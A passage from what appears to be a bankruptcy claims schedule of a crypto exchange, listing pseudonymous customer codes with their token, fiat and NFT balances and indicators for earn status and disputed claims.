| 07336646 | | CUSDT[2], DOGE[1], TRX[2], USD[0.00], USDT[1] | | |
| 07336647 | | CUSDT[1], DOGE[52.60010763], LINK[.31443191], USD[0.00] | | |
| 07336648 | | BTC[0], DAI[0], DOGE[0], ETH[0], GRT[0], SOL[0.00000001], SUSHI[0], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07336650 | | USD[10.00] | | |
| 07336651 | | USD[10.00] | | |
| 07336652 | | CUSDT[1], DOGE[50.02394177], USD[0.00] | | |
| 07336654 | | USD[10.00] | | |
| 07336655 | | DOGE[123.73697034], USD[0.00] | | |
| 07336656 | | USD[10.00] | | |
| 07336657 | | USD[0.29] | | |
| 07336658 | | DOGE[1], USD[117.20] | | |
| 07336659 | | USD[10.00] | | |
| 07336660 | | USD[10.00] | | |
| 07336661 | | USD[10.00] | | |
| 07336662 | | USD[10.00] | | |
| 07336663 | | DOGE[549.01538706], USD[0.00] | Yes | |
| 07336664 | | USD[10.00] | | |
| 07336666 | | CUSDT[72.15179096], DOGE[3112.15647231], USD[0.60] | | |
| 07336667 | | BRZ[1], CUSDT[4], GRT[1], TRX[4], USD[474.99] | | |
| 07336668 | | DOGE[1], ETH[0], GRT[0], SOL[0], TRX[1], USD[0.01], USDT[0] | Yes | |
| 07336670 | | BCH[.00000001], DOGE[.0318888], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07336671 | | BRZ[1], DOGE[2], LTC[0], SOL[0], SUSHI[0], TRX[1], UNI[0], USD[0.00], USDT[0] | | |
| 07336672 | | DOGE[6.50982056], USD[0.00] | | |
| 07336673 | | DOGE[144.28638191], USD[0.00] | | |
| 07336674 | | CUSDT[3], DOGE[919.3266844], ETH[.01577071], ETHW[.01557919], TRX[1], USD[0.00] | Yes | |
| 07336675 | | CUSDT[3], DOGE[105.34512516], USD[0.00], USDT[0.00005028] | | |
| 07336676 | | CUSDT[7], DOGE[4363.10472428], LTC[.04837469], SUSHI[2.65554315], TRX[515.98780119], USD[0.00] | Yes | |
| 07336677 | | CUSDT[1], DOGE[1], TRX[1], USD[0.95] | | |
| 07336678 | | BRZ[1], CUSDT[4], DOGE[4805.0259371], TRX[2], USD[0.00] | | |
| 07336680 | | USD[10.00] | | |
| 07336681 | | AVAX[0], BRZ[1], BTC[0], DOGE[2.14356817], GBP[0.00], GRT[0], LINK[0], MATIC[0], NFT (3066154340568685444/Son Wukong: Wheelie)[1], NFT (446465931675940798/APEFUEL by Almond Breeze #507)[1], NFT (496448008748632307/NFT Blue)[1], NFT (497219071864765423/APEFUEL by Almond Breeze #778)[1], SHIB[1358244.15500398], SOL[0.02263742], SUSHI[0.00000600], TRX[1.75], USD[0.00], USDT[0.00000002] | Yes | |
| 07336682 | | USD[10.00] | | |
| 07336683 | | BRZ[1], DOGE[34.30596488], ETH[0], TRX[1], USD[0.00] | | |
| 07336684 | | DOGE[1091.00424556], USD[0.00] | | |
| 07336685 | | USD[10.00] | | |
| 07336687 | | USD[10.00] | | |
| 07336688 | | USD[10.00] | | |
| 07336689 | | BTC[.00000006], DOGE[33.28927587], USD[0.00] | Yes | |
| 07336690 | | GRT[13.3353997], USD[0.00] | Yes | |
| 07336691 | | USD[10.00] | | |
| 07336692 | | USD[10.00] | | |
| 07336693 | | CUSDT[7], TRX[1], USD[1797.99] | Yes | |
| 07336694 | | ETH[.00614432], ETHW[.00606218], USD[0.00] | Yes | |
| 07336695 | | USD[10.00] | | |
| 07336697 | | USD[10.00] | | |
| 07336698 | | BRZ[0], BTC[.06759205], DOGE[2], ETH[4.26127951], ETHW[4.25945089], LTC[2.71873153], USD[0.00] | Yes | |
| 07336701 | | USD[10.89] | Yes | |
| 07336702 | | USD[10.00] | | |
| 07336703 | | DOGE[178.29636439], USD[0.00] | | |
| 07336704 | | DOGE[1], SOL[0.72269033], USD[0.00] | | |
| 07336705 | | BRZ[3], CUSDT[2], DOGE[.00000452], USD[0.03] | | |
| 07336707 | | DOGE[38.63260727], USD[0.00] | Yes | |
| 07336708 | | DOGE[3096.78156892], USD[0.00] | | |
| 07336709 | | DOGE[10692.81194496], ETH[1.2968634], ETHW[1.2968634], GRT[1], TRX[2877.94242234], USD[0.00], USDT[0] | | |
| 07336710 | | USD[10.00] | | |
| 07336711 | | DOGE[0.00046341], USD[0.28] | | |
| 07336712 | | USD[0.01] | | |
| 07336713 | | USD[10.00] | | |
| 07336714 | | BTC[1.08682793], LINK[6896.45231248], USD[74394.58], USDT[0] | Yes | |
| 07336715 | | BRZ[1], USD[0.00] | | |
| 07336716 | | BTC[0], USD[1.47] | Yes | |
| 07336717 | | USD[10.00] | | |
| 07336718 | | BRZ[0], DOGE[.00003469], USD[0.07] | | |
| 07336719 | | CUSDT[1], DOGE[8], USD[0.00] | | |
| 07336720 | | DOGE[119.00819967], TRX[1], USD[0.00] | | |
| 07336722 | | BRZ[1], CUSDT[1], TRX[1], USD[0.18], USDT[.494505] | | |
| 07336723 | | USD[10.00] | | |
| 07336724 | | USD[10.00] | | |
| 07336725 | | USD[0.00] | | |
| 07336726 | | DOGE[1], TRX[1], USD[0.30] | | |
| 07336727 | | CUSDT[1], DOGE[181.67711945], TRX[6.41349288], USD[0.00] | | |
| 07336728 | | DOGE[1.0019652], USD[0.00] | | |
| 07336729 | | USD[10.00] | | |
| 07336730 | | USD[10.00] | | |
| 07336731 | | CUSDT[1], DOGE[68.97567736], TRX[1], USD[0.00] | | |
| 07336732 | | USD[10.00] | | |
| 07336733 | | ETH[0], LINK[0], SOL[0], USD[0.00] | | |
| 07336734 | | DOGE[17.7700673], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07336735 | | USD[10.00] | | |
| 07336736 | | DOGE[134.87868336], USD[0.00] | | |
| 07336737 | | CUSDT[33.69995443], USD[0.00] | | |
| 07336738 | | BF_POINT[200], DOGE[0], ETH[0], LINK[0], LTC[0.87349710], SOL[1.26199866], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07336739 | | BTC[.00000001], CUSDT[2], DOGE[1], SHIB[1], TRX[1], USD[0.00] | Yes | |
| 07336740 | | BRZ[2], BTC[0], CUSDT[14], DOGE[6.22675400], ETH[0], LTC[0], MATIC[.00044339], SUSHI[0], TRX[1], UNI[0], USD[0.01], USDT[0] | Yes | |
| 07336741 | | USD[10.00] | | |
| 07336742 | | BRZ[5], GRT[1], NFT [308530686965327573/SOLYETIS #3192][1], NFT [543404851076455069/Nobu Sensei #315][1], NFT [543689840140343718/Panda #4648][1], SHIB[1.88541042], SOL[5.54628195], TRX[2.00016483], USD[0.00] | Yes | |
| 07336743 | | USD[10.00] | | |
| 07336744 | | CUSDT[2], DOGE[1], TRX[2], USD[0.00], USDT[1] | | |
| 07336745 | | DOGE[10591.14276571], USD[10.00] | | |
| 07336746 | | USD[10.00] | | |
| 07336747 | | DOGE[26.87758442], USD[1.00] | | |
| 07336748 | | USD[0.08] | | |
| 07336749 | | CUSDT[1], DOGE[0], TRX[2], USD[0.00] | | |
| 07336750 | | BTC[0], DOGE[1.13747371], USD[0.00] | | |
| 07336751 | | SHIB[103078.48456913], USD[0.00] | | |
| 07336752 | | USD[10.00] | | |
| 07336753 | | CUSDT[1], TRX[1], USD[3.70] | | |
| 07336754 | | USD[10.00] | | |
| 07336755 | | USD[10.00] | | |
| 07336756 | | BRZ[2], BTC[.00000003], DOGE[2], TRX[1], USD[0.00] | | |
| 07336757 | | CUSDT[1], DOGE[0], TRX[0], USD[0.00] | | |
| 07336758 | | USD[10.00] | | |
| 07336759 | | CUSDT[3], TRX[3], USD[68.77] | | |
| 07336760 | | USD[10.00] | | |
| 07336761 | | BAT[0], BTC[0], DOGE[0], SHIB[12274.63132150], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00] | Yes | |
| 07336762 | | BAT[.00002961], CUSDT[1], DAI[.0004653], USD[0.00] | | |
| 07336764 | | TRX[166.22017158], USD[0.00] | | |
| 07336765 | | BRZ[1], CUSDT[3], DOGE[1], ETH[2.0369126], ETHW[2.0369126], SOL[10.52638503], TRX[4], USD[0.00], USDT[196.38770003] | | |
| 07336766 | | BTC[0], DOGE[0], ETH[0], ETHW[0], USD[0.04] | | |
| 07336767 | | USD[10.00] | | |
| 07336768 | | DOGE[2], LTC[.24583618], USD[0.24] | | |
| 07336769 | | USD[9.76] | | |
| 07336770 | | USD[10.00] | | |
| 07336771 | | CUSDT[7], DOGE[2759.55128438], SHIB[45375.44828282], USD[0.00] | | |
| 07336772 | | USD[10.00] | | |
| 07336773 | | USD[10.00] | | |
| 07336775 | | BRZ[1], CUSDT[7], DAI[9.88971269], DOGE[1854.30079469], ETH[.06345652], ETHW[.06345652], LINK[2.11410894], LTC[.29065843], SHIB[19131.43294432], SOL[2.01496086], TRX[3], USD[0.34], USDT[9.94407343] | | |
| 07336776 | | USD[10.00] | | |
| 07336777 | | BAT[.00004919], BTC[0], DAI[0], DOGE[0], ETH[0], ETHW[0.00000091], GRT[0], LINK[0], MATIC[0], NFT [332839764756660562/Dagg  Art #10][1], PAXG[0], SHIB[7], SOL[0.00000007], USD[0.00] | Yes | |
| 07336778 | | USD[10.00] | | |
| 07336779 | | USD[47.57] | | |
| 07336780 | | BAT[1.0160915], BF_POINT[300], BRZ[.00000851], CUSDT[21.00005228], DOGE[2.05563643], GRT[.00078135], KSHIB[20.3290845], SHIB[27586027.07652451], TRX[1], USD[38.92], USDT[0.00105046] | Yes | |
| 07336781 | | CUSDT[1], DOGE[.00088504], USD[0.01] | | |
| 07336782 | | USD[10.00] | | |
| 07336784 | | USD[10.00] | | |
| 07336785 | | USD[10.00] | | |
| 07336786 | | USD[10.00] | | |
| 07336787 | | BRZ[2], CUSDT[19], DOGE[3], ETH[.00000071], ETHW[.00000071], SOL[.00001013], TRX[2], USD[0.00] | Yes | |
| 07336788 | | USD[0.00] | | |
| 07336789 | | USD[10.00] | | |
| 07336790 | | USD[10.00] | | |
| 07336791 | | ETH[.00237682], ETHW[.00237682], USD[0.00] | | |
| 07336792 | | CUSDT[2], DOGE[6], USD[0.00] | | |
| 07336793 | | USD[10.00] | | |
| 07336794 | | CUSDT[1], DOGE[4181.77326047], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07336795 | | USD[10.00] | | |
| 07336796 | | USD[0.01] | | |
| 07336797 | | USD[10.00] | | |
| 07336798 | | USD[10.00] | | |
| 07336799 | | TRX[3], USD[0.01] | Yes | |
| 07336800 | | CUSDT[1], TRX[2], USD[24.75] | | |
| 07336802 | | USD[0.00] | | |
| 07336803 | | USD[10.00] | | |
| 07336805 | | BTC[.00021453], USD[0.00] | | |
| 07336806 | | USD[0.00] | | |
| 07336807 | | USD[10.00] | | |
| 07336809 | | USD[10.00] | | |
| 07336810 | | USD[10.00] | | |
| 07336811 | | CUSDT[1], DOGE[995.94366503], USD[0.00] | | |
| 07336812 | | DOGE[174.01767232], TRX[1], USD[50.00] | | |
| 07336813 | | USD[1.66] | | |
| 07336814 | | BTC[.00018306], USD[0.00] | | |
| 07336815 | | USD[10.00] | | |
| 07336816 | | DOGE[687.0353168], GRT[1], USD[0.00] | Yes | |
| 07336817 | | USD[10.00] | | |
| 07336819 | | USD[10.00] | | |
| 07336820 | | BRZ[1], DOGE[1], TRX[2], USD[0.00] | | |
| 07336821 | | USD[10.00] | | |
| 07336822 | | USD[10.00] | | |
| 07336823 | | DOGE[.00003734], USD[10.00] | | |
| 07336824 | | CUSDT[1], DOGE[26.71249248], USD[0.00] | | |
| 07336825 | | DOGE[.0008588], LINK[12.71193433], TRX[2], USD[10.00] | | |
| 07336826 | | USD[0.00] | | |
| 07336827 | | DOGE[1], USD[60.42] | | |
| 07336828 | | CUSDT[2], DOGE[1], USD[0.01] | | |
| 07336830 | | USD[10.00] | | |
| 07336831 | | CUSDT[1], USD[0.01] | | |
| 07336832 | | USD[0.00] | | |
| 07336833 | | USD[10.00] | | |
| 07336834 | | BRZ[1], CUSDT[1], TRX[1], USD[0.01] | Yes | |
| 07336835 | | CUSDT[1], DOGE[1132.6014755], TRX[1], USD[0.00] | | |
| 07336836 | | BRZ[0], BTC[0], DOGE[0.38993149], GRT[0], LINK[0], SUSHI[0], USD[0.00] | | |
| 07336837 | | CUSDT[1], DOGE[334.66260886], TRX[1], USD[0.00] | | |
| 07336838 | | USD[10.00] | | |
| 07336839 | | BTC[.00943506], CUSDT[1], DOGE[2358.14567255], ETH[.01561926], ETHW[.01542774], LINK[3.99283316], LTC[.3979258], NFT (327634858692364094/Piece #9)[1], SHIB[4955549.46905101], SOL[2.17580581], TRX[849.29762558], USD[0.23] | Yes | |
| 07336840 | | BAT[1], CUSDT[1], DOGE[.53646757], TRX[1], USD[0.01] | | |
| 07336841 | | BTC[0], USD[0.00] | Yes | |
| 07336842 | | BTC[.00159454], CUSDT[11], ETH[.01305845], ETHW[.01289429], SHIB[2219243.84615748], SUSHI[5.51615719], TRX[4], USD[0.00] | Yes | |
| 07336843 | | USD[0.00] | | |
| 07336844 | | CUSDT[1], TRX[2], USD[0.00] | | |
| 07336845 | | DOGE[1.36945742], ETH[.00022306], ETHW[.00022306], USD[0.01] | | |
| 07336846 | | BTC[.00021492], CUSDT[1], DOGE[2000.38799909], TRX[1], USD[0.24] | | |
| 07336847 | | DOGE[30.03402644], USD[0.00] | | |
| 07336848 | | USD[10.00] | | |
| 07336849 | | CUSDT[1], DOGE[.00060544], USD[0.00] | | |
| 07336850 | | USD[10.00] | | |
| 07336851 | | CUSDT[9], TRX[1.86057726], USD[20.53] | | |
| 07336852 | | USD[10.00] | | |
| 07336853 | | ETH[.00498409], ETHW[.00498409], USD[0.00] | | |
| 07336854 | | USD[10.00] | | |
| 07336855 | | USD[10.00] | | |
| 07336856 | | GRT[0], SHIB[339599.33055653], USD[0.00], USDT[0] | Yes | |
| 07336857 | | DOGE[1.778859], USD[9.87] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07336858 | | USD[10.00] | | |
| 07336859 | | BAT[73.34608242], BRZ[4], CUSDT[9.38959225], DAI[2.33621199], DOGE[129.72415041], MATIC[0], SHIB[81662571.38697306], SOL[1.05444761], TRX[2.07055591], USD[0.00], USDT[3.56158019] | Yes | |
| 07336860 | | USD[10.00] | | |
| 07336861 | | USD[10.00] | | |
| 07336862 | | BAT[0], BCH[0], GRT[0], UNI[0], USD[0.00] | | |
| 07336863 | | BTC[0], ETH[.00000001], ETHW[0], SOL[0], USD[0.00], WBTC[0] | | |
| 07336864 | | CUSDT[1], DOGE[124.73944716], TRX[1], USD[0.07] | | |
| 07336865 | | USD[10.00] | | |
| 07336866 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07336867 | | CUSDT[2], DOGE[130.60413461], USD[0.00] | | |
| 07336868 | | USD[10.00] | | |
| 07336869 | | LTC[.00005527], USD[0.00] | | |
| 07336870 | | BRZ[1], CUSDT[2], TRX[5], USD[0.00] | | |
| 07336871 | | DOGE[1], USD[0.67] | | |
| 07336872 | | USD[10.00] | | |
| 07336873 | | BRZ[1], CUSDT[274.27351211], DOGE[9207.78897412], LINK[17.9429362], SOL[44.92928845], TRX[54.54042034], UNI[16.4792998], USD[0.03] | Yes | |
| 07336874 | | CUSDT[8], DOGE[132.6674915], LTC[.00005609], TRX[1], USD[0.00] | Yes | |
| 07336875 | | BRZ[1], CUSDT[14], DOGE[0], ETH[0], TRX[1], USD[0.01] | | |
| 07336876 | | TRX[1], USD[0.00] | | |
| 07336878 | | USD[10.00] | | |
| 07336879 | | BRZ[0], BTC[0], DOGE[4.07888543], ETH[0.00000129], ETHW[0.00000129], GRT[0], LINK[0], LTC[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07336881 | | USD[10.00] | | |
| 07336882 | | CUSDT[1], GRT[1], TRX[3], USD[0.01] | | |
| 07336883 | | CUSDT[1.9810749], USD[0.00] | Yes | |
| 07336884 | | USD[10.00] | | |
| 07336885 | | BTC[.0012404], CUSDT[10], DOGE[130.33368676], ETH[.00789715], ETHW[.00780139], GRT[1.00498957], TRX[4], USD[4.34] | Yes | |
| 07336886 | | USD[10.00] | | |
| 07336887 | | BTC[.00055425], DOGE[150.631], ETH[.0104393], ETHW[.0104393], SHIB[113176.7999295], USD[0.67] | | |
| 07336888 | | USD[10.00] | | |
| 07336889 | | USD[10.00] | | |
| 07336890 | | USD[10.00] | | |
| 07336891 | | USD[10.00] | | |
| 07336892 | | BRZ[1], BTC[0], CUSDT[1], TRX[2], USD[0.00] | | |
| 07336893 | | USD[10.00] | | |
| 07336894 | | CUSDT[1], DOGE[1.00003073], USD[0.00] | | |
| 07336895 | | DOGE[20.06821869], USD[0.00] | | |
| 07336896 | | USD[10.00] | | |
| 07336897 | | USD[0.00] | | |
| 07336898 | | USD[10.00] | | |
| 07336899 | | BTC[.00039879], USD[10.00] | | |
| 07336900 | | CUSDT[237.01555992], DOGE[1.00976752], SUSHI[.00099516], USD[0.76] | | |
| 07336901 | | USD[10.00] | | |
| 07336902 | | USD[10.00] | | |
| 07336903 | | USD[10.00] | | |
| 07336904 | | USD[10.00] | | |
| 07336905 | | USD[10.00] | | |
| 07336907 | | DOGE[.02543737], USD[0.00], USDT[0] | | |
| 07336908 | | USD[10.00] | | |
| 07336909 | | USD[10.00] | | |
| 07336910 | | BRZ[4], CUSDT[3], TRX[2], USD[0.01], USDT[1] | | |
| 07336911 | | CUSDT[2], DOGE[1], TRX[1], USD[0.01] | | |
| 07336912 | | USD[0.00] | | |
| 07336913 | | USD[10.00] | | |
| 07336914 | | CUSDT[2], DOGE[1.60366229], TRX[2], USD[0.07] | | |
| 07336915 | | DOGE[38.90587745], ETH[.00041656], ETHW[.00041656], USD[0.00] | | |
| 07336916 | | USD[10.00] | | |
| 07336917 | | USD[10.00] | | |
| 07336918 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07336919 | | CUSDT[1], USD[0.01] | | |
| 07336920 | | DOGE[25.86502404], USD[0.00] | | |
| 07336921 | | CUSDT[5], SHIB[364648.47872009], USD[0.00] | | |
| 07336922 | | DOGE[1.63291709], ETH[0], LINK[0], LTC[0], TRX[0], USD[0.00] | | |
| 07336923 | | CUSDT[1], DOGE[.81722993], USD[0.01] | | |
| 07336924 | | BRZ[2], CUSDT[91.25572199], DOGE[2], GRT[1.00312819], SHIB[413613.4380542], TRX[9.01102039], USD[10.20] | Yes | |
| 07336926 | | BRZ[1], CUSDT[1], DOGE[1], USD[0.61] | | |
| 07336927 | | BRZ[2], CUSDT[2], DOGE[2], GRT[8.41812334], SHIB[1], TRX[1], USD[0.01], USDT[0] | Yes | |
| 07336928 | | CUSDT[1], ETH[0], GRT[0], TRX[3], USD[0.00] | | |
| 07336929 | | DOGE[31.87968962], USD[0.00] | | |
| 07336930 | | DOGE[0], SHIB[20350.90682085], USD[0.01], USDT[0] | Yes | |
| 07336931 | | USD[10.00] | | |
| 07336932 | | TRX[75.62105111], USD[0.00] | | |
| 07336933 | | USD[10.00] | | |
| 07336935 | | BRZ[1], CUSDT[7], GRT[1.00313735], TRX[3], USD[0.01], USDT[0] | Yes | |
| 07336936 | | BTC[.00000106], USD[0.00] | | |
| 07336937 | | BRZ[3], CUSDT[8], DOGE[2], TRX[1], USD[0.00] | | |
| 07336938 | | USD[10.00] | | |
| 07336939 | | DOGE[0.08125489], USD[0.01] | Yes | |
| 07336940 | | DOGE[1], SOL[0], USD[0.00] | Yes | |
| 07336941 | | CUSDT[1], DOGE[483.95920877], SUSHI[0], USD[0.71] | | |
| 07336942 | | DOGE[1], USD[29.57] | | |
| 07336943 | | USD[10.00] | | |
| 07336944 | | BRZ[2], CUSDT[5], DOGE[9.53576681], TRX[6.92724776], USD[0.00] | | |
| 07336945 | | BRZ[.00036515], CUSDT[1], USD[0.74] | | |
| 07336946 | | USD[10.00] | | |
| 07336947 | | DOGE[133.07378622], USD[5.00] | | |
| 07336948 | | CUSDT[1], DOGE[17.95715811], GRT[1], TRX[3], USD[0.00] | | |
| 07336949 | | USD[10.00] | | |
| 07336950 | | BAT[1], CUSDT[4], TRX[5], USD[0.01], USDT[2] | | |
| 07336951 | | USD[802.48], USDT[0] | Yes | |
| 07336952 | | USD[10.00] | | |
| 07336953 | | USD[10.00] | | |
| 07336954 | | DOGE[139.60519928], USD[0.00] | | |
| 07336956 | | BTC[0], DOGE[48.18244781], ETH[0.00000001], LTC[0], USD[0.00] | | |
| 07336957 | | DOGE[125.19546141], TRX[1], USD[0.00] | | |
| 07336958 | | USD[10.00] | | |
| 07336959 | | BRZ[0], DOGE[.0000042], TRX[1], USD[0.01] | Yes | |
| 07336960 | | USD[10.00] | | |
| 07336961 | | DOGE[36.03141362], USD[109.00] | | |
| 07336962 | | DOGE[3343.70662585], TRX[1], USD[10.00] | | |
| 07336963 | | USD[10.00] | | |
| 07336964 | | USD[10.00] | | |
| 07336965 | | BRZ[1], CUSDT[1], USD[0.00] | | |
| 07336966 | | USD[10.00] | | |
| 07336967 | | CUSDT[4], GRT[.02319732], TRX[.00004582], USD[0.00] | | |
| 07336969 | | DOGE[5392.45034418], USD[0.00] | | |
| 07336970 | | USD[10.00] | | |
| 07336971 | | USD[10.00] | | |
| 07336972 | | USD[0.00] | | |
| 07336973 | | BRZ[2], DOGE[1], USD[0.80] | | |
| 07336974 | Contingent, Disputed | DOGE[24426.30911449], USD[10.00] | | |
| 07336975 | | CUSDT[2], DOGE[132.87298976], ETH[.00411232], ETHW[.00411232], USD[85.00] | | |
| 07336976 | | USD[10.00] | | |
| 07336977 | | USD[10.00] | | |
| 07336978 | | USD[10.00] | | |
| 07336979 | | LINK[0], USD[0.00] | | |
| 07336980 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07336981 | | CUSDT[1], USD[0.01] | | |
| 07336982 | | CUSDT[1], DOGE[5292.62227715], TRX[1], USD[0.00] | | |
| 07336983 | | CUSDT[1], DOGE[0], TRX[2], USD[0.26], USDT[0] | | |
| 07336984 | | BRZ[1], CUSDT[1], DOGE[.64334671], TRX[2], USD[0.00] | | |
| 07336985 | | USD[10.00] | | |
| 07336986 | | USD[10.00] | | |
| 07336987 | | USD[0.00] | Yes | |
| 07336988 | | DOGE[189.88692472], USD[0.00] | Yes | |
| 07336989 | | USD[0.06] | | |
| 07336990 | | AUD[0.00], BCH[0], CUSDT[2], DOGE[10.20719603], ETH[0], ETHW[0], TRX[244.22488314], USD[0.93] | Yes | |
| 07336991 | | CUSDT[5], DOGE[1], LINK[0], LTC[0], TRX[2], USD[0.00] | | |
| 07336992 | | NFT (305273178895016429/Bahrain Ticket Stub #792)[1], SHIB[1], SOL[.12582206], USD[0.00] | Yes | |
| 07336993 | | TRX[.22968499], USD[0.00], USDT[0] | Yes | |
| 07336994 | | CUSDT[4], SHIB[155836.76281935], TRX[553.31961137], USD[0.00] | Yes | |
| 07336995 | | USD[10.00] | | |
| 07336996 | | USD[10.00] | | |
| 07336997 | | USD[0.83], USDT[0] | | |
| 07336998 | | USD[10.00] | | |
| 07336999 | | BAT[1.0165555], BRZ[3], CUSDT[7], DOGE[4.02732036], ETH[.17288318], ETHW[.17260984], GRT[666.51995336], SHIB[1], SOL[1.09727266], SUSHI[7.57478177], TRX[.01748088], UNI[1.31895189], USD[91.52] | Yes | |
| 07337000 | | DOGE[12.19816904], USD[0.00], USDT[0] | Yes | |
| 07337001 | | USD[10.00] | | |
| 07337002 | | BRZ[1], CUSDT[8], USD[0.62] | | |
| 07337003 | | DOGE[15.01886061], USD[0.00] | | |
| 07337004 | | USD[10.00] | | |
| 07337005 | | MATIC[49.56540117], NFT (544710958378957207/FTX - Off The Grid Miami #1878)[1], SUSHI[.66478449], USD[0.00] | Yes | |
| 07337006 | | BRZ[2], CUSDT[2], TRX[1], USD[0.00] | | |
| 07337007 | | BTC[.00297728], CUSDT[6], DOGE[1252.16908944], ETH[.00525774], ETHW[.00518934], SHIB[4061391.75991324], TRX[1], USD[0.00] | Yes | |
| 07337008 | | USD[10.00] | | |
| 07337009 | | BRZ[2], CUSDT[5], KSHIB[1360.9604679], SHIB[2580152.98615341], TRX[1], USD[0.00] | | |
| 07337011 | | USD[10.00] | | |
| 07337012 | | CUSDT[2], TRX[2], USD[135.77] | | |
| 07337013 | | CUSDT[62.4203423], DOGE[397.01803954], USD[0.00], USDT[1.10030632] | Yes | |
| 07337014 | | CUSDT[1], DOGE[0], USD[0.01] | | |
| 07337015 | | USD[10.00] | | |
| 07337016 | | CUSDT[72.63189529], GRT[1.00498957], TRX[11.20850112], USD[0.06] | Yes | |
| 07337017 | | CUSDT[1], ETH[.00000001], ETHW[0], TRX[1], USD[0.00] | | |
| 07337018 | | CUSDT[1], TRX[5], USD[0.00], USDT[1] | | |
| 07337019 | | USD[10.00] | | |
| 07337020 | | USD[10.00] | | |
| 07337021 | | DOGE[274.55171881], USD[10.00] | | |
| 07337022 | | DOGE[1569.84499748], USD[60.00] | | |
| 07337023 | | USD[10.00] | | |
| 07337024 | | USD[0.00] | Yes | |
| 07337025 | | USD[0.01] | | |
| 07337026 | | USD[10.00] | | |
| 07337027 | | CUSDT[2], DOGE[38.8636384], SHIB[213446.83069144], USD[0.15] | Yes | |
| 07337030 | | USD[10.00] | | |
| 07337031 | | USD[32.81], USDT[0] | | |
| 07337032 | | DOGE[19.60646684], USD[0.00] | | |
| 07337033 | | USD[10.00] | | |
| 07337034 | | USD[10.00] | | |
| 07337035 | | DOGE[124.03972497], USD[0.00] | Yes | |
| 07337036 | | BTC[0], CUSDT[1], DOGE[404.19874046], USD[0.00] | Yes | |
| 07337037 | | BRZ[1], CUSDT[3], DOGE[0], TRX[2], USD[0.00] | | |
| 07337039 | | GRT[.00089959], USD[0.00] | | |
| 07337040 | | USD[10.00] | | |
| 07337041 | | DOGE[3], ETH[0], ETHW[0], LTC[0], NFT (312572239901060484/Australia Ticket Stub #749)[1], NFT (398382892096073395/Barcelona Ticket Stub #636)[1], USD[10.38] | | |
| 07337042 | | USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07337043 | | BTC[.00051732], CUSDT[1], DOGE[1.78981659], GRT[.0000393], LINK[.32789001], SOL[.25058239], TRX[2.76896978], USD[0.91] | | |
| 07337045 | | LINK[0], SHIB[1206660.40182621], TRX[0], USD[0.00] | Yes | |
| 07337046 | | USD[10.00] | | |
| 07337047 | | USD[10.00] | | |
| 07337049 | | USD[10.00] | | |
| 07337050 | | USD[10.00] | | |
| 07337051 | | USD[0.05] | | |
| 07337053 | | USD[10.00] | | |
| 07337055 | | USD[0.01], YFI[0] | | |
| 07337056 | | BTC[0], DOGE[0], ETH[0], ETHW[0], MATIC[0], SOL[0], SUSHI[0], USD[0.00] | Yes | |
| 07337059 | | USD[10.00] | | |
| 07337060 | | USD[10.00] | | |
| 07337061 | | USD[10.00] | | |
| 07337062 | | USD[10.00] | | |
| 07337063 | | USD[10.00] | | |
| 07337065 | | CUSDT[3], DOGE[.11782878], ETH[.0139844], ETHW[.0139844], TRX[2], USD[0.37] | | |
| 07337066 | | TRX[75.88069218], USD[0.00] | | |
| 07337068 | | ETH[0], ETHW[0], USD[6.08] | | |
| 07337070 | | DOGE[13212.22301433], USD[0.00] | Yes | |
| 07337071 | | DOGE[1.58164959], USD[0.00] | | |
| 07337072 | | TRX[219.79118518], USD[0.00] | | |
| 07337073 | | BTC[.00000001], DOGE[.00224167], USD[0.00] | | |
| 07337074 | | BRZ[4], CUSDT[5], DOGE[2], ETH[.30666687], ETHW[.30666687], GRT[552.93817653], USD[0.00] | | |
| 07337075 | | USD[60.00] | | |
| 07337076 | | USD[10.00] | | |
| 07337077 | | USD[10.00] | | |
| 07337078 | | NFT (487906087197393091/Cosmic Creations #863)[1], USD[2.69] | | |
| 07337079 | | BRZ[1], CUSDT[1], TRX[2], USD[0.00] | | |
| 07337080 | | USD[10.00] | | |
| 07337081 | | CUSDT[1], USD[102.69] | | |
| 07337082 | | DOGE[1], USD[0.00] | | |
| 07337083 | | USD[10.00] | | |
| 07337084 | | USD[10.00] | | |
| 07337085 | | USD[10.00] | | |
| 07337086 | | CUSDT[1], DOGE[1.51679161], TRX[2], USD[0.01], USDT[0] | | |
| 07337087 | | BAT[1], CUSDT[3], DOGE[1916.62336414], TRX[1], USD[0.00] | | |
| 07337088 | | CUSDT[1], DOGE[30.07850972], USD[0.00] | | |
| 07337089 | | USD[10.00] | | |
| 07337090 | | USD[10.00] | | |
| 07337092 | | USD[10.00] | | |
| 07337093 | | USD[10.00] | | |
| 07337094 | | GRT[2.47855839], LINK[.09558942], SOL[.31058954], SUSHI[.17116765], USD[0.00] | | |
| 07337095 | | USD[10.00] | | |
| 07337096 | | USD[10.00] | | |
| 07337097 | | USD[10.00] | | |
| 07337098 | | USD[0.00], USDT[0.00015536] | | |
